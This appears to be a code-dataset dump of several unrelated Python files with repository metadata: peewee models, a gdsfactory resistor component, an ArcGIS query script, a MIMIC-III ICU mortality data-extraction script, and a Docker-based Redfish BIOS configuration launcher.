:return: Булевое значения True если пользователь найден
"""
res = self.get_or_none(User.user_id == user_id)
if res: # User is find
return res
return False
class Meta:
database = db
class Archive(Model):
"""
Модель дял хранения записей
"""
id = PrimaryKeyField(null=False, unique=True)
start_date = DateTimeField(null=False)
finish_date = DateTimeField(null=False)
file_id = CharField(null=False, max_length=50)
class Meta:
database = db
def get_archive(self, hour, day, month, year):
"""
Получения архима исходя из часа, дня, месяца и года
:param hour:
:param day:
:param month:
:param year:
:return:
"""
archive_date = datetime.strptime(f"{year}/{month}/{day}-{hour}", "%Y/%m/%d-%H").strftime("%Y-%m-%d %H")
return self.get_or_none(Archive.start_date >= archive_date)
def add_archive(self, start_date, file_id):
"""
Добавления архива записи в базу
:param start_date:
:param file_id:
:return:
"""
check = self.get_or_none(Archive.start_date == start_date)
if check:
check.file_id = file_id
check.save()
logger.info(f"Update archive [{start_date}] with file [{file_id}]")
return self.get(Archive.start_date == start_date)
return self.create(
start_date=start_date,
finish_date=start_date + timedelta(hours=1),
file_id=file_id
)
User.create_table(safe=True)
Archive.create_table(safe=True)
user = User()
archive = Archive()
| 30.762376 | 111 | 0.620856 | 376 | 3,107 | 4.981383 | 0.345745 | 0.057662 | 0.03417 | 0.030432 | 0.168713 | 0.103577 | 0.065136 | 0 | 0 | 0 | 0 | 0.004468 | 0.279691 | 3,107 | 100 | 112 | 31.07 | 0.83244 | 0.193756 | 0 | 0.115385 | 0 | 0 | 0.054185 | 0.022026 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.076923 | 0 | 0.538462 | 0.019231 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
4912467ee29fbe811c78fea1ef046cb9707fcd7e | 2,507 | py | Python | gdsfactory/components/resistance_sheet.py | simbilod/gdsfactory | 4d76db32674c3edb4d16260e3177ee29ef9ce11d | [
"MIT"
] | null | null | null | gdsfactory/components/resistance_sheet.py | simbilod/gdsfactory | 4d76db32674c3edb4d16260e3177ee29ef9ce11d | [
"MIT"
] | null | null | null | gdsfactory/components/resistance_sheet.py | simbilod/gdsfactory | 4d76db32674c3edb4d16260e3177ee29ef9ce11d | [
"MIT"
] | null | null | null | from functools import partial
from gdsfactory.cell import cell
from gdsfactory.component import Component
from gdsfactory.components.compass import compass
from gdsfactory.components.via_stack import via_stack_slab_npp_m3
from gdsfactory.types import ComponentSpec, Floats, LayerSpecs, Optional
pad_via_stack_slab_npp = partial(via_stack_slab_npp_m3, size=(80, 80))
@cell
def resistance_sheet(
width: float = 10,
layers: LayerSpecs = ("SLAB90", "NPP"),
layer_offsets: Floats = (0, 0.2),
pad: ComponentSpec = pad_via_stack_slab_npp,
pad_pitch: float = 100.0,
ohms_per_square: Optional[float] = None,
port_orientation1: int = 180,
port_orientation2: int = 0,
) -> Component:
"""Returns Sheet resistance.
keeps connectivity for pads and first layer in layers
Args:
width: in um.
layers: for the middle part.
layer_offsets: from edge, positive: over, negative: inclusion.
pad: function to create a pad.
pad_pitch: in um.
ohms_per_square: optional sheet resistance to compute info.resistance.
port_orientation1: in degrees.
port_orientation2: in degrees.
"""
c = Component()
pad = pad()
length = pad_pitch - pad.get_setting("size")[0]
pad1 = c << pad
pad2 = c << pad
r0 = c << compass(
size=(length + layer_offsets[0], width + layer_offsets[0]), layer=layers[0]
)
for layer, offset in zip(layers[1:], layer_offsets[1:]):
c << compass(size=(length + 2 * offset, width + 2 * offset), layer=layer)
pad1.connect("e3", r0.ports["e1"])
pad2.connect("e1", r0.ports["e3"])
c.info["resistance"] = ohms_per_square * width * length if ohms_per_square else None
c.add_port(
"pad1",
port_type="vertical_dc",
midpoint=pad1.center,
layer=list(layers)[-1],
width=width,
orientation=port_orientation1,
)
c.add_port(
"pad2",
port_type="vertical_dc",
midpoint=pad2.center,
layer=list(layers)[-1],
width=width,
orientation=port_orientation2,
)
return c
if __name__ == "__main__":
# import gdsfactory as gf
# sweep = [resistance_sheet(width=width, layers=((1,0), (1,1))) for width in [1, 10, 100]]
# c = gf.pack(sweep)[0]
c = resistance_sheet(width=40)
c.show()
# import gdsfactory as gf
# sweep_resistance = list(map(resistance_sheet, (5, 10, 80)))
# c = gf.grid(sweep_resistance)
# c.show()
| 28.816092 | 94 | 0.643797 | 331 | 2,507 | 4.694864 | 0.320242 | 0.045045 | 0.030888 | 0.03861 | 0.184041 | 0.105534 | 0.060489 | 0.060489 | 0.060489 | 0 | 0 | 0.03663 | 0.237734 | 2,507 | 86 | 95 | 29.151163 | 0.776557 | 0.265656 | 0 | 0.156863 | 0 | 0 | 0.038677 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.019608 | false | 0.058824 | 0.117647 | 0 | 0.156863 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
4913c3ea285b469820f3898e3feff4274634fe9e | 494 | py | Python | VerifyServer.py | ACueva/Avi-Playground | cb1768999630ed884cff5d40c0faa86d24802754 | [
"Apache-2.0"
] | null | null | null | VerifyServer.py | ACueva/Avi-Playground | cb1768999630ed884cff5d40c0faa86d24802754 | [
"Apache-2.0"
] | null | null | null | VerifyServer.py | ACueva/Avi-Playground | cb1768999630ed884cff5d40c0faa86d24802754 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
import os
import urllib2, json
from urlparse import urlparse
def ParseURL(agsURL):
ags = []
print agsURL
ags = urlparse(agsURL)
return ags
def GetFolders(agsURL):
f = urllib2.urlopen(agsURL)
j = json.loads(f.read())
for item in j["folders"]:
print item
def MapServiceQuery(agsURL):
f = urllib2.urlopen(agsURL)
#print f.read()
j = json.loads(f.read())
for item in j["layers"]:
print item["name"] | 21.478261 | 31 | 0.61336 | 66 | 494 | 4.590909 | 0.439394 | 0.049505 | 0.092409 | 0.138614 | 0.343234 | 0.165017 | 0.165017 | 0.165017 | 0.165017 | 0 | 0 | 0.008242 | 0.263158 | 494 | 23 | 32 | 21.478261 | 0.824176 | 0.068826 | 0 | 0.222222 | 0 | 0 | 0.037037 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.166667 | null | null | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
491871e30f2b60781d5b69aef6ac73571b60d676 | 19,637 | py | Python | homework1/problem3/local/mort_icu.py | criticaldata/hst953-2021 | b18c8235a6c878a4a7d3d330a9b69421f0217273 | [
"MIT"
] | 1 | 2022-03-15T15:52:45.000Z | 2022-03-15T15:52:45.000Z | homework1/problem3/local/mort_icu.py | MDenu/HST-homework | fff0f277ee18735acbe84dfe8c428e92991b28fa | [
"MIT"
] | null | null | null | homework1/problem3/local/mort_icu.py | MDenu/HST-homework | fff0f277ee18735acbe84dfe8c428e92991b28fa | [
"MIT"
] | 3 | 2021-09-10T19:14:54.000Z | 2021-09-26T22:23:05.000Z | # Generates the following data files from MIMIC:
# adult_icu.gz: data from adult ICUs
# n_icu.gz: data from neonatal ICUs
# adult_notes.gz: clinical notes from adult ICUs
# Import libraries
import numpy as np
import pandas as pd
import psycopg2
from scipy.stats import ks_2samp
import os
import random
# Ouput directory to generate the files
mimicdir = os.path.expanduser("./mimic_data/")
random.seed(42)
# create a database connection
sqluser = 'mimicuser'
dbname = 'mimic'
schema_name = 'mimiciii'
# Connect to local postgres version of mimic
con = psycopg2.connect(dbname=dbname, user=sqluser, host='127.0.0.1', password='PASSWORD')
cur = con.cursor()
cur.execute('SET search_path to ' + schema_name)
#========helper function for imputing missing values
def replace(group):
"""
takes in a pandas group, and replaces the
null value with the mean of the none null
values of the same group
"""
mask = group.isnull()
group[mask] = group[~mask].mean()
return group
#========get the icu details
# this query extracts the following:
# Unique ids for the admission, patient and icu stay
# Patient gender
# admission & discharge times
# length of stay
# age
# ethnicity
# admission type
# in hospital death?
# in icu death?
# one year from admission death?
# first hospital stay
# icu intime, icu outime
# los in icu
# first icu stay?
denquery = \
"""
-- This query extracts useful demographic/administrative information for patient ICU stays
--DROP MATERIALIZED VIEW IF EXISTS icustay_detail CASCADE;
--CREATE MATERIALIZED VIEW icustay_detail as
--ie is the icustays table
--adm is the admissions table
SELECT ie.subject_id, ie.hadm_id, ie.icustay_id
, pat.gender
, adm.admittime, adm.dischtime, adm.diagnosis
, ROUND( (CAST(adm.dischtime AS DATE) - CAST(adm.admittime AS DATE)) , 4) AS los_hospital
, ROUND( (CAST(adm.admittime AS DATE) - CAST(pat.dob AS DATE)) / 365, 4) AS age
, adm.ethnicity, adm.ADMISSION_TYPE
--, adm.hospital_expire_flag
, CASE when adm.deathtime between ie.intime and ie.outtime THEN 1 ELSE 0 END AS mort_icu
, DENSE_RANK() OVER (PARTITION BY adm.subject_id ORDER BY adm.admittime) AS hospstay_seq
, CASE
WHEN DENSE_RANK() OVER (PARTITION BY adm.subject_id ORDER BY adm.admittime) = 1 THEN 1
ELSE 0 END AS first_hosp_stay
-- icu level factors
, ie.intime, ie.outtime
, ie.FIRST_CAREUNIT
, ROUND( (CAST(ie.outtime AS DATE) - CAST(ie.intime AS DATE)) , 4) AS los_icu
, DENSE_RANK() OVER (PARTITION BY ie.hadm_id ORDER BY ie.intime) AS icustay_seq
-- first ICU stay *for the current hospitalization*
, CASE
WHEN DENSE_RANK() OVER (PARTITION BY ie.hadm_id ORDER BY ie.intime) = 1 THEN 1
ELSE 0 END AS first_icu_stay
FROM icustays ie
INNER JOIN admissions adm
ON ie.hadm_id = adm.hadm_id
INNER JOIN patients pat
ON ie.subject_id = pat.subject_id
WHERE adm.has_chartevents_data = 1
ORDER BY ie.subject_id, adm.admittime, ie.intime;
"""
den = pd.read_sql_query(denquery,con)
#----drop patients with less than 48 hour
den['los_icu_hr'] = (den.outtime - den.intime).astype('timedelta64[h]')
den = den[(den.los_icu_hr >= 48)]
den = den[(den.age<300)]
den.drop('los_icu_hr', axis = 1, inplace = True)
# den.isnull().sum()
#----clean up
# micu --> medical
# csru --> cardiac surgery recovery unit
# sicu --> surgical icu
# tsicu --> Trauma Surgical Intensive Care Unit
# NICU --> Neonatal
den['adult_icu'] = np.where(den['first_careunit'].isin(['PICU', 'NICU']), 0, 1)
den['gender'] = np.where(den['gender']=="M", 1, 0)
# no need to yell
den.ethnicity = den.ethnicity.str.lower()
den.ethnicity.loc[(den.ethnicity.str.contains('^white'))] = 'white'
den.ethnicity.loc[(den.ethnicity.str.contains('^black'))] = 'black'
den.ethnicity.loc[(den.ethnicity.str.contains('^hisp')) | (den.ethnicity.str.contains('^latin'))] = 'hispanic'
den.ethnicity.loc[(den.ethnicity.str.contains('^asia'))] = 'asian'
den.ethnicity.loc[~(den.ethnicity.str.contains('|'.join(['white', 'black', 'hispanic', 'asian'])))] = 'other'
den = pd.concat([den, pd.get_dummies(den['ethnicity'], prefix='eth')], axis = 1)
den = pd.concat([den, pd.get_dummies(den['admission_type'], prefix='admType')], axis = 1)
den.drop(['diagnosis', 'hospstay_seq', 'los_icu','icustay_seq', 'admittime', 'dischtime','los_hospital', 'intime', 'outtime', 'ethnicity', 'admission_type', 'first_careunit'], axis = 1, inplace = True)
#========= 48 hour vitals query
# these are the normal ranges. useful to clean
# up the data
vitquery = \
"""
-- This query pivots the vital signs for the first 48 hours of a patient's stay
-- Vital signs include heart rate, blood pressure, respiration rate, and temperature
-- DROP MATERIALIZED VIEW IF EXISTS vitalsfirstday CASCADE;
-- create materialized view vitalsfirstday as
SELECT pvt.subject_id, pvt.hadm_id, pvt.icustay_id
-- Easier names
, min(case when VitalID = 1 then valuenum else null end) as HeartRate_Min
, max(case when VitalID = 1 then valuenum else null end) as HeartRate_Max
, avg(case when VitalID = 1 then valuenum else null end) as HeartRate_Mean
, min(case when VitalID = 2 then valuenum else null end) as SysBP_Min
, max(case when VitalID = 2 then valuenum else null end) as SysBP_Max
, avg(case when VitalID = 2 then valuenum else null end) as SysBP_Mean
, min(case when VitalID = 3 then valuenum else null end) as DiasBP_Min
, max(case when VitalID = 3 then valuenum else null end) as DiasBP_Max
, avg(case when VitalID = 3 then valuenum else null end) as DiasBP_Mean
, min(case when VitalID = 4 then valuenum else null end) as MeanBP_Min
, max(case when VitalID = 4 then valuenum else null end) as MeanBP_Max
, avg(case when VitalID = 4 then valuenum else null end) as MeanBP_Mean
, min(case when VitalID = 5 then valuenum else null end) as RespRate_Min
, max(case when VitalID = 5 then valuenum else null end) as RespRate_Max
, avg(case when VitalID = 5 then valuenum else null end) as RespRate_Mean
, min(case when VitalID = 6 then valuenum else null end) as TempC_Min
, max(case when VitalID = 6 then valuenum else null end) as TempC_Max
, avg(case when VitalID = 6 then valuenum else null end) as TempC_Mean
, min(case when VitalID = 7 then valuenum else null end) as SpO2_Min
, max(case when VitalID = 7 then valuenum else null end) as SpO2_Max
, avg(case when VitalID = 7 then valuenum else null end) as SpO2_Mean
, min(case when VitalID = 8 then valuenum else null end) as Glucose_Min
, max(case when VitalID = 8 then valuenum else null end) as Glucose_Max
, avg(case when VitalID = 8 then valuenum else null end) as Glucose_Mean
FROM (
select ie.subject_id, ie.hadm_id, ie.icustay_id
, case
when itemid in (211,220045) and valuenum > 0 and valuenum < 300 then 1 -- HeartRate
when itemid in (51,442,455,6701,220179,220050) and valuenum > 0 and valuenum < 400 then 2 -- SysBP
when itemid in (8368,8440,8441,8555,220180,220051) and valuenum > 0 and valuenum < 300 then 3 -- DiasBP
when itemid in (456,52,6702,443,220052,220181,225312) and valuenum > 0 and valuenum < 300 then 4 -- MeanBP
when itemid in (615,618,220210,224690) and valuenum > 0 and valuenum < 70 then 5 -- RespRate
when itemid in (223761,678) and valuenum > 70 and valuenum < 120 then 6 -- TempF, converted to degC in valuenum call
when itemid in (223762,676) and valuenum > 10 and valuenum < 50 then 6 -- TempC
when itemid in (646,220277) and valuenum > 0 and valuenum <= 100 then 7 -- SpO2
when itemid in (807,811,1529,3745,3744,225664,220621,226537) and valuenum > 0 then 8 -- Glucose
else null end as VitalID
-- convert F to C
, case when itemid in (223761,678) then (valuenum-32)/1.8 else valuenum end as valuenum
from icustays ie
left join chartevents ce
on ie.subject_id = ce.subject_id and ie.hadm_id = ce.hadm_id and ie.icustay_id = ce.icustay_id
and ce.charttime between ie.intime and ie.intime + interval '48' hour
-- exclude rows marked as error
and ce.error IS DISTINCT FROM 1
where ce.itemid in
(
-- HEART RATE
211, --"Heart Rate"
220045, --"Heart Rate"
-- Systolic/diastolic
51, -- Arterial BP [Systolic]
442, -- Manual BP [Systolic]
455, -- NBP [Systolic]
6701, -- Arterial BP #2 [Systolic]
220179, -- Non Invasive Blood Pressure systolic
220050, -- Arterial Blood Pressure systolic
8368, -- Arterial BP [Diastolic]
8440, -- Manual BP [Diastolic]
8441, -- NBP [Diastolic]
8555, -- Arterial BP #2 [Diastolic]
220180, -- Non Invasive Blood Pressure diastolic
220051, -- Arterial Blood Pressure diastolic
-- MEAN ARTERIAL PRESSURE
456, --"NBP Mean"
52, --"Arterial BP Mean"
6702, -- Arterial BP Mean #2
443, -- Manual BP Mean(calc)
220052, --"Arterial Blood Pressure mean"
220181, --"Non Invasive Blood Pressure mean"
225312, --"ART BP mean"
-- RESPIRATORY RATE
618,-- Respiratory Rate
615,-- Resp Rate (Total)
220210,-- Respiratory Rate
224690, -- Respiratory Rate (Total)
-- SPO2, peripheral
646, 220277,
-- GLUCOSE, both lab and fingerstick
807,-- Fingerstick Glucose
811,-- Glucose (70-105)
1529,-- Glucose
3745,-- BloodGlucose
3744,-- Blood Glucose
225664,-- Glucose finger stick
220621,-- Glucose (serum)
226537,-- Glucose (whole blood)
-- TEMPERATURE
223762, -- "Temperature Celsius"
676, -- "Temperature C"
223761, -- "Temperature Fahrenheit"
678 -- "Temperature F"
)
) pvt
group by pvt.subject_id, pvt.hadm_id, pvt.icustay_id
order by pvt.subject_id, pvt.hadm_id, pvt.icustay_id;
"""
vit48 = pd.read_sql_query(vitquery,con)
vit48.isnull().sum()
#===============48 hour labs query
# This query does the following:
# it extracts the lab events in the first 48 hours
# it labels the lab items and cleans up their values
# it will create a set of lab values
# 48 hours.
labquery = \
"""
WITH pvt AS (
--- ie is the icu stay
--- ad is the admissions table
--- le is the lab events table
SELECT ie.subject_id, ie.hadm_id, ie.icustay_id, le.charttime
-- here we assign labels to ITEMIDs
-- this also fuses together multiple ITEMIDs containing the same data
, CASE
when le.itemid = 50868 then 'ANION GAP'
when le.itemid = 50862 then 'ALBUMIN'
when le.itemid = 50882 then 'BICARBONATE'
when le.itemid = 50885 then 'BILIRUBIN'
when le.itemid = 50912 then 'CREATININE'
when le.itemid = 50806 then 'CHLORIDE'
when le.itemid = 50902 then 'CHLORIDE'
when le.itemid = 50809 then 'GLUCOSE'
when le.itemid = 50931 then 'GLUCOSE'
when le.itemid = 50810 then 'HEMATOCRIT'
when le.itemid = 51221 then 'HEMATOCRIT'
when le.itemid = 50811 then 'HEMOGLOBIN'
when le.itemid = 51222 then 'HEMOGLOBIN'
when le.itemid = 50813 then 'LACTATE'
when le.itemid = 50960 then 'MAGNESIUM'
when le.itemid = 50970 then 'PHOSPHATE'
when le.itemid = 51265 then 'PLATELET'
when le.itemid = 50822 then 'POTASSIUM'
when le.itemid = 50971 then 'POTASSIUM'
when le.itemid = 51275 then 'PTT'
when le.itemid = 51237 then 'INR'
when le.itemid = 51274 then 'PT'
when le.itemid = 50824 then 'SODIUM'
when le.itemid = 50983 then 'SODIUM'
when le.itemid = 51006 then 'BUN'
when le.itemid = 51300 then 'WBC'
when le.itemid = 51301 then 'WBC'
ELSE null
END AS label
, -- add in some sanity checks on the values
-- the where clause below requires all valuenum to be > 0,
-- so these are only upper limit checks
CASE
when le.itemid = 50862 and le.valuenum > 10 then null -- g/dL 'ALBUMIN'
when le.itemid = 50868 and le.valuenum > 10000 then null -- mEq/L 'ANION GAP'
when le.itemid = 50882 and le.valuenum > 10000 then null -- mEq/L 'BICARBONATE'
when le.itemid = 50885 and le.valuenum > 150 then null -- mg/dL 'BILIRUBIN'
when le.itemid = 50806 and le.valuenum > 10000 then null -- mEq/L 'CHLORIDE'
when le.itemid = 50902 and le.valuenum > 10000 then null -- mEq/L 'CHLORIDE'
when le.itemid = 50912 and le.valuenum > 150 then null -- mg/dL 'CREATININE'
when le.itemid = 50809 and le.valuenum > 10000 then null -- mg/dL 'GLUCOSE'
when le.itemid = 50931 and le.valuenum > 10000 then null -- mg/dL 'GLUCOSE'
when le.itemid = 50810 and le.valuenum > 100 then null -- % 'HEMATOCRIT'
when le.itemid = 51221 and le.valuenum > 100 then null -- % 'HEMATOCRIT'
when le.itemid = 50811 and le.valuenum > 50 then null -- g/dL 'HEMOGLOBIN'
when le.itemid = 51222 and le.valuenum > 50 then null -- g/dL 'HEMOGLOBIN'
when le.itemid = 50813 and le.valuenum > 50 then null -- mmol/L 'LACTATE'
when le.itemid = 50960 and le.valuenum > 60 then null -- mmol/L 'MAGNESIUM'
when le.itemid = 50970 and le.valuenum > 60 then null -- mg/dL 'PHOSPHATE'
when le.itemid = 51265 and le.valuenum > 10000 then null -- K/uL 'PLATELET'
when le.itemid = 50822 and le.valuenum > 30 then null -- mEq/L 'POTASSIUM'
when le.itemid = 50971 and le.valuenum > 30 then null -- mEq/L 'POTASSIUM'
when le.itemid = 51275 and le.valuenum > 150 then null -- sec 'PTT'
when le.itemid = 51237 and le.valuenum > 50 then null -- 'INR'
when le.itemid = 51274 and le.valuenum > 150 then null -- sec 'PT'
when le.itemid = 50824 and le.valuenum > 200 then null -- mEq/L == mmol/L 'SODIUM'
when le.itemid = 50983 and le.valuenum > 200 then null -- mEq/L == mmol/L 'SODIUM'
when le.itemid = 51006 and le.valuenum > 300 then null -- 'BUN'
when le.itemid = 51300 and le.valuenum > 1000 then null -- 'WBC'
when le.itemid = 51301 and le.valuenum > 1000 then null -- 'WBC'
ELSE le.valuenum
END AS valuenum
FROM icustays ie
LEFT JOIN labevents le
ON le.subject_id = ie.subject_id
AND le.hadm_id = ie.hadm_id
-- TODO: they are using lab times 6 hours before the start of the
-- ICU stay.
AND le.charttime between (ie.intime - interval '6' hour)
AND (ie.intime + interval '48' hour)
AND le.itemid IN
(
-- comment is: LABEL | CATEGORY | FLUID | NUMBER OF ROWS IN LABEVENTS
50868, -- ANION GAP | CHEMISTRY | BLOOD | 769895
50862, -- ALBUMIN | CHEMISTRY | BLOOD | 146697
50882, -- BICARBONATE | CHEMISTRY | BLOOD | 780733
50885, -- BILIRUBIN, TOTAL | CHEMISTRY | BLOOD | 238277
50912, -- CREATININE | CHEMISTRY | BLOOD | 797476
50902, -- CHLORIDE | CHEMISTRY | BLOOD | 795568
50806, -- CHLORIDE, WHOLE BLOOD | BLOOD GAS | BLOOD | 48187
50931, -- GLUCOSE | CHEMISTRY | BLOOD | 748981
50809, -- GLUCOSE | BLOOD GAS | BLOOD | 196734
51221, -- HEMATOCRIT | HEMATOLOGY | BLOOD | 881846
50810, -- HEMATOCRIT, CALCULATED | BLOOD GAS | BLOOD | 89715
51222, -- HEMOGLOBIN | HEMATOLOGY | BLOOD | 752523
50811, -- HEMOGLOBIN | BLOOD GAS | BLOOD | 89712
50813, -- LACTATE | BLOOD GAS | BLOOD | 187124
50960, -- MAGNESIUM | CHEMISTRY | BLOOD | 664191
50970, -- PHOSPHATE | CHEMISTRY | BLOOD | 590524
51265, -- PLATELET COUNT | HEMATOLOGY | BLOOD | 778444
50971, -- POTASSIUM | CHEMISTRY | BLOOD | 845825
50822, -- POTASSIUM, WHOLE BLOOD | BLOOD GAS | BLOOD | 192946
51275, -- PTT | HEMATOLOGY | BLOOD | 474937
51237, -- INR(PT) | HEMATOLOGY | BLOOD | 471183
51274, -- PT | HEMATOLOGY | BLOOD | 469090
50983, -- SODIUM | CHEMISTRY | BLOOD | 808489
50824, -- SODIUM, WHOLE BLOOD | BLOOD GAS | BLOOD | 71503
51006, -- UREA NITROGEN | CHEMISTRY | BLOOD | 791925
51301, -- WHITE BLOOD CELLS | HEMATOLOGY | BLOOD | 753301
51300 -- WBC COUNT | HEMATOLOGY | BLOOD | 2371
)
AND le.valuenum IS NOT null
AND le.valuenum > 0 -- lab values cannot be 0 and cannot be negative
LEFT JOIN admissions ad
ON ie.subject_id = ad.subject_id
AND ie.hadm_id = ad.hadm_id
),
ranked AS (
SELECT pvt.*, DENSE_RANK() OVER (PARTITION BY
pvt.subject_id, pvt.hadm_id,pvt.icustay_id,pvt.label ORDER BY pvt.charttime) as drank
FROM pvt
)
SELECT r.subject_id, r.hadm_id, r.icustay_id
, max(case when label = 'ANION GAP' then valuenum else null end) as ANIONGAP
, max(case when label = 'ALBUMIN' then valuenum else null end) as ALBUMIN
, max(case when label = 'BICARBONATE' then valuenum else null end) as BICARBONATE
, max(case when label = 'BILIRUBIN' then valuenum else null end) as BILIRUBIN
, max(case when label = 'CREATININE' then valuenum else null end) as CREATININE
, max(case when label = 'CHLORIDE' then valuenum else null end) as CHLORIDE
, max(case when label = 'GLUCOSE' then valuenum else null end) as GLUCOSE
, max(case when label = 'HEMATOCRIT' then valuenum else null end) as HEMATOCRIT
, max(case when label = 'HEMOGLOBIN' then valuenum else null end) as HEMOGLOBIN
, max(case when label = 'LACTATE' then valuenum else null end) as LACTATE
, max(case when label = 'MAGNESIUM' then valuenum else null end) as MAGNESIUM
, max(case when label = 'PHOSPHATE' then valuenum else null end) as PHOSPHATE
, max(case when label = 'PLATELET' then valuenum else null end) as PLATELET
, max(case when label = 'POTASSIUM' then valuenum else null end) as POTASSIUM
, max(case when label = 'PTT' then valuenum else null end) as PTT
, max(case when label = 'INR' then valuenum else null end) as INR
, max(case when label = 'PT' then valuenum else null end) as PT
, max(case when label = 'SODIUM' then valuenum else null end) as SODIUM
, max(case when label = 'BUN' then valuenum else null end) as BUN
, max(case when label = 'WBC' then valuenum else null end) as WBC
FROM ranked r
WHERE r.drank = 1
GROUP BY r.subject_id, r.hadm_id, r.icustay_id, r.drank
ORDER BY r.subject_id, r.hadm_id, r.icustay_id, r.drank;
"""
lab48 = pd.read_sql_query(labquery,con)
#=========notes
notesquery = \
"""
SELECT fin.subject_id, fin.hadm_id, fin.icustay_id, string_agg(fin.text, ' ') as chartext
FROM (
select ie.subject_id, ie.hadm_id, ie.icustay_id, ne.text
from icustays ie
left join noteevents ne
on ie.subject_id = ne.subject_id and ie.hadm_id = ne.hadm_id
and ne.charttime between ie.intime and ie.intime + interval '48' hour
--and ne.iserror != '1'
) fin
group by fin.subject_id, fin.hadm_id, fin.icustay_id
order by fin.subject_id, fin.hadm_id, fin.icustay_id;
"""
notes48 = pd.read_sql_query(notesquery,con)
#=====combine all variables
mort_ds = den.merge(vit48,how = 'left', on = ['subject_id', 'hadm_id', 'icustay_id'])
mort_ds = mort_ds.merge(lab48,how = 'left', on = ['subject_id', 'hadm_id', 'icustay_id'])
#======missing values (following joydeep ghosh's paper)
# create means by age group and gender
mort_ds['age_group'] = pd.cut(mort_ds['age'], [-1,5,10,15,20, 25, 40,60, 80, 200],
labels = ['l5','5_10', '10_15', '15_20', '20_25', '25_40', '40_60', '60_80', '80p'])
mort_ds = mort_ds.groupby(['age_group', 'gender'])
mort_ds = mort_ds.transform(replace)
#mort_ds.drop('age_group', 1, inplace =True )
# one missing variable
adult_icu = mort_ds[(mort_ds.adult_icu==1)].dropna()
# create training and testing labels
msk = np.random.rand(len(adult_icu)) < 0.7
adult_icu['train'] = np.where(msk, 1, 0)
adult_icu.to_csv(os.path.join(mimicdir, 'adult_icu.gz'), compression='gzip', index = False)
# notes
adult_notes = notes48.merge(adult_icu[['train', 'subject_id', 'hadm_id', 'icustay_id', 'mort_icu']], how = 'right', on = ['subject_id', 'hadm_id', 'icustay_id'])
adult_notes.to_csv(os.path.join(mimicdir, 'adult_notes.gz'), compression='gzip', index = False)
| 41.254202 | 202 | 0.685135 | 2,988 | 19,637 | 4.437082 | 0.186078 | 0.033188 | 0.048876 | 0.045105 | 0.422688 | 0.313094 | 0.262257 | 0.220697 | 0.201539 | 0.183059 | 0 | 0.078119 | 0.204054 | 19,637 | 475 | 203 | 41.341053 | 0.770122 | 0.082192 | 0 | 0 | 1 | 0 | 0.212693 | 0 | 0 | 0 | 0 | 0.002105 | 0 | 1 | 0.018519 | false | 0.018519 | 0.111111 | 0 | 0.148148 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4918f13347223ad7457de28e1dde690394ca0299 | 2,176 | py | Python | bios-token.py | emahear/openusm | 96bb62b91f4b5520e14d86ae86e1b320404134e6 | [
"MIT"
] | 4 | 2019-08-04T05:50:46.000Z | 2020-04-16T19:24:11.000Z | bios-token.py | emahear/openusm | 96bb62b91f4b5520e14d86ae86e1b320404134e6 | [
"MIT"
] | null | null | null | bios-token.py | emahear/openusm | 96bb62b91f4b5520e14d86ae86e1b320404134e6 | [
"MIT"
] | 6 | 2019-08-03T12:57:47.000Z | 2020-06-08T01:50:43.000Z | import os
import argparse
def _create_parser():
parser = argparse.ArgumentParser(description='Welcome to Universal Systems Manager'
'Bios Token Change')
parser.add_argument('--verbose',
help='Turn on verbose logging',
action='store_true')
parser.add_argument('-i', '--idrac',
help='iDRAC IP of the Host'
)
parser.add_argument('-n', '--nfs',
help='NFS server IP address',
default=None)
parser.add_argument('-s', '--share',
help='NFS Share folder'
)
parser.add_argument('-c', '--config',
help='XML File to be imported'
)
parser.add_argument('-f', '--ips',
help='IP files to be updated'
)
return parser
def main():
parser = _create_parser()
args = parser.parse_args()
nfs_server = args.nfs
idrac = args.idrac
nfs_share = args.share
config = args.config
os.system("docker build -t ajeetraina/usm_redfish . ")
if(args.ips):
ip_file = args.ips
ips_file = open(ip_file)
ips = ips_file.readlines()
for ip in ips:
print ("Iteration %s"%ip)
ip = ip.strip()
command = "docker run --rm --log-driver=syslog --log-opt syslog-address=tcp://0.0.0.0:5000 --log-opt syslog-facility=daemon -itd --name=%s_server -e IDRAC_IP=%s -e NFS_SERVER=%s -e NFS_SERVER_SHARE=%s -e CONFIG_FILE=%s ajeetraina/usm_redfish python import_scp.py &"%(ip,ip,nfs_server,nfs_share,config)
print command
os.system(command)
if (args.idrac):
os.system(
"docker run --rm --log-driver=syslog --log-opt syslog-address=tcp://0.0.0.0:5000 --log-opt syslog-facility=daemon -itd --name=%s_server -e IDRAC_IP=%s -e NFS_SERVER=%s -e NFS_SERVER_SHARE=%s -e CONFIG_FILE=%s ajeetraina/usm_redfish python import_scp.py &" % (
idrac,idrac, nfs_server, nfs_share, config))
if __name__ == '__main__':
main()
